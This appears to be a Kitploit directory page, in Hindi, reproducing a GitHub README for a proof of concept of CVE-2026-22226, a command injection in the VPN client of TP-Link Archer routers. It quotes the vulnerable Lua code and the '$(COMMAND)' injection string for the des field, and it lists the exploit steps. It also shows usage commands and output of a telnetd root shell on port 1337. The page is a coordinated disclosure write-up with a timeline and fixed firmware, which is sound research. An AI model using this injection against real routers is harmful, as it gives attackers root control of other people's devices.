Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22226 — Proof of Concept for the CVE-2026-22226 | Kitploit
उपकरण/GitHubGitHub/lucasvanhaaren/cve-2026-22226
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and Control
GitHublucasvanhaaren/cve-2026-22226

CVE-2026-22226

Proof of Concept for the CVE-2026-22226

रिपॉजिटरी देखें
111 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2026-22226

CVE-2026-22226 के लिए प्रूफ ऑफ कॉन्सेप्ट

TP-Link Archer वाई-फाई राउटर्स के VPN क्लाइंट में प्रमाणित LAN-साइड OS कमांड इंजेक्शन


भेद्यता संक्षिप्त

VPN क्लाइंट कंट्रोलर उपयोगकर्ता-नियंत्रित एंट्री विवरण (des) को कमजोर सत्यापन रेगेक्स के साथ UCI कॉन्फ़िगरेशन में संग्रहीत करता है। जब बाद में एंट्री को वापस पढ़ा जाता है (WebUI में संपादित करते समय), get_ovpn_data() des को एक उद्धृत शेल कमांड में शामिल करता है जो बिना किसी सैनिटाइज़ेशन के os.execute() को पास किया जाता है :

root@kitploit:~
-- get_ovpn_data() in vpn.lua

file_ovpn_path_local = string.format("/etc/openvpn/%s%s", des_name, ".ovpn")
cmd = string.format("echo '%s' > %s", file_ovpn_path_local, EXIST_OVPN_CURR_EDIT)
os.execute(cmd)

एकल-उद्धरण वर्ण (') सत्यापन रेगेक्स को पार कर जाता है, जो शेल उद्धरण से बाहर निकलने और $() प्रतिस्थापन के माध्यम से कमांड इंजेक्ट करने के लिए पर्याप्त है। '$(COMMAND)' पर सेट एक des फ़ील्ड कमांड को निम्न में बदल देता है :

root@kitploit:~
echo '/etc/openvpn/'$(COMMAND)'.ovpn' > /tmp/ovpn_curr_edit

ध्यान दें कि कमांड आउटपुट HTTP प्रतिक्रिया में कभी नहीं लौटाया जाता है, इसलिए इंजेक्शन ब्लाइंड है। यही कारण है कि हमें एक आउट-ऑफ-बैंड चैनल की आवश्यकता है (यहाँ PoC स्क्रिप्ट एक इंटरैक्टिव शेल प्राप्त करने के लिए telnetd सर्वर को स्पॉन करती है)।

प्रूफ ऑफ कॉन्सेप्ट

[!Note] मैंने इस स्क्रिप्ट का परीक्षण केवल TP-Link Archer AX73 (AX5400, HW v2.0 EU, FW v1.2.1 - बिल्ड 20250717) पर किया, लेकिन अन्य Archer डिवाइस भी संभावित रूप से असुरक्षित हैं।

यह PoC निम्न प्रक्रिया का पालन करता है :

  • LuCI में admin के रूप में प्रमाणित करें
  • एक डमी .ovpn कॉन्फ़िगरेशन फ़ाइल अपलोड करें
  • एक ज़हरीला des फ़ील्ड के साथ VPN क्लाइंट एंट्री सम्मिलित करें, एकल-उद्धृत संदर्भ से बचकर और कमांड प्रतिस्थापन के माध्यम से हमारे पेलोड को इंजेक्ट करें
  • एंट्री को वापस पढ़कर get_ovpn_data() को ट्रिगर करें, जो ज़हरीले des को os.execute() में फीड करता है
  • ज़हरीली VPN एंट्री को साफ़ करें (यह बाद में एक्सप्लॉइट को फिर से चलाने की अनुमति देता है)

[!Warning] इस भेद्यता का शोषण राउटर पर root के रूप में OS कमांड निष्पादन (पूर्ण डिवाइस समझौता) की ओर ले जाता है, जो अनुमत एकल-उद्धरण वर्ण के माध्यम से des इनपुट सत्यापन को बायपास करता है।

उपयोग

Python निर्भरताएँ स्क्रिप्ट में इनलाइन घोषित की गई हैं, इसलिए आप इसे सीधे आधुनिक Python प्रोजेक्ट मैनेजर के साथ चला सकते हैं, या pip के साथ मैन्युअल रूप से स्थापित कर सकते हैं :

root@kitploit:~
# using pipx
pipx run poc.py
# using uv
uv run poc.py

# using pip (legacy) then run with python
pip install requests pycryptodome
python poc.py
  • लक्ष्य IP, क्रेडेंशियल्स और पेलोड को poc.py में सेट करें

  • स्क्रिप्ट चलाएँ :

root@kitploit:~
$ pipx run poc.py
INFO:__main__:TP-Link Archer Exploit PoC
INFO:__main__:Authentication ...
INFO:__main__:Authentication ... OK
INFO:__main__:Uploading .ovpn ...
INFO:__main__:Uploading .ovpn ... OK
INFO:__main__:Inserting VPN entry ...
INFO:__main__:Inserting VPN entry ... OK
INFO:__main__:Triggering command injection ...
INFO:__main__:Triggering command injection ... OK
INFO:__main__:Cleaning up ...
INFO:__main__:Cleaning up ... OK
  • स्पॉन किए गए telnetd सर्वर के साथ इंटरैक्ट करें :
root@kitploit:~
$ telnet 192.168.0.1 1337

BusyBox v1.19.4 (2025-07-17 10:58:00 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/www # id
uid=0(root) gid=0(root)
/www # uname -a
Linux Archer AX73 4.19.183 #1 SMP PREEMPT Thu Jul 17 10:22:47 CST 2025 armv7l GNU/Linux

समयरेखा

  • 2026-02-18 : TP-Link को भेद्यता की सूचना दी गई, एक विस्तृत रिपोर्ट और प्रूफ ऑफ कॉन्सेप्ट स्क्रिप्ट प्रदान की गई
  • 2026-03-25 : TP-Link ने रिपोर्ट स्वीकार की और संकेत दिया कि प्रक्रिया में 90 दिन तक लग सकते हैं
  • 2026-05-13 : TP-Link ने अतिरिक्त 30 दिनों का अनुरोध किया, जिसे हमने स्वीकार किया
  • 2026-05-16 : CVE-2026-22226 आवंटित किया गया, जो कुछ दिन पहले एक अन्य शोधकर्ता द्वारा BE230 पर रिपोर्ट किए गए उसी बग को ट्रैक करता है; प्रकटीकरण तिथि 2026-07-22 निर्धारित की गई
  • 2026-06-04 : फिक्स्ड AX73 फर्मवेयर जारी किया गया (v1.3.1)
  • 2026-07-22 : सार्वजनिक प्रकटीकरण

संदर्भ

  • CVE-2026-22226
  • TP-Link सुरक्षा सलाह
टूल डाउनलोड करें